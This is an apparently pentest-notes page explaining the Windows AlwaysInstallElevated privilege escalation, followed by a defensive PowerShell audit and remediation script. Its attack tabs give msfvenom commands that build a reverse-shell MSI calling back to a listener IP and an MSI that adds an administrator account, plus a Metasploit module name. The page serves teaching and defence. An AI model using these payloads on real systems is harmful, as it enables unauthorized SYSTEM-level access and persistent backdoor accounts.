# AlwaysInstallElevated

Windows systems are exposed to local privilege escalation when the registry values `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` and `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` are both set to `1`. With this misconfiguration, any local user can run Windows Installer (`.msi`) packages with elevated privileges. Exploitation consists of generating a malicious `.msi` payload and executing it through `msiexec`, which results in code execution as `SYSTEM`.

There are [various ways](https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated) to exploit this misconfiguration:

{% tabs %}
{% tab title="RevShell" %}
{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f msi -o revshell.msi
```

{% endcode %}
{% endtab %}

{% tab title="Admin User" %}
Create an admin user:

{% code overflow="wrap" %}

```bash
# Create an admin user (No UAC format)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi

# Create an admin user (when run through msiexec, UAC does not prompt)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi

# PowerUp (PowerShell function)
Write-UserAddMSI
```

{% endcode %}
{% endtab %}

{% tab title="Meterpreter" %}
If you have a Meterpreter session, you can automate this technique with the following module:

```bash
> use exploit/windows/local/always_install_elevated
```

{% endtab %}
{% endtabs %}
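
From the defender's side, the two-value condition described at the top of this page can be audited directly. The following PowerShell is an added example, not code from the original page or from PowerUp; the function name `Get-AlwaysInstallElevatedStatus` and its output fields are assumptions, and it goes beyond the single `HKCU` check by walking every loaded user hive under `HKEY_USERS`.

```powershell
# Added defensive example: audit the AlwaysInstallElevated policy values.
# Function name and output fields are illustrative assumptions.
function Get-AlwaysInstallElevatedStatus {
    $sub  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $name = 'AlwaysInstallElevated'

    # Helper: return the DWORD value, or $null when the key or value is absent.
    function Read-PolicyValue([string]$Path) {
        $item = Get-ItemProperty -Path $Path -Name $name -ErrorAction SilentlyContinue
        if ($null -ne $item) { return [int]$item.$name }
        return $null
    }

    $machine = Read-PolicyValue "Registry::HKEY_LOCAL_MACHINE\$sub"

    # HKCU is only the caller's own hive. Walk every loaded user hive under
    # HKEY_USERS so an administrator sees all logged-on accounts.
    Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' } |
        ForEach-Object {
            $user = Read-PolicyValue "Registry::HKEY_USERS\$($_.PSChildName)\$sub"
            [pscustomobject]@{
                Sid          = $_.PSChildName
                MachineValue = $machine
                UserValue    = $user
                # Exposed only when both values are 1, as described above.
                Exposed      = ($machine -eq 1 -and $user -eq 1)
            }
        }
}

Get-AlwaysInstallElevatedStatus | Format-Table -AutoSize

# Remediation for the machine-wide value (run elevated). The per-user value is
# normally delivered by Group Policy and should be disabled there as well.
# Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' `
#     -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
```

Any row with `Exposed` set to `True` identifies an account for which both values are `1`; hives of users who are not logged on are not loaded and are not covered by this check.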
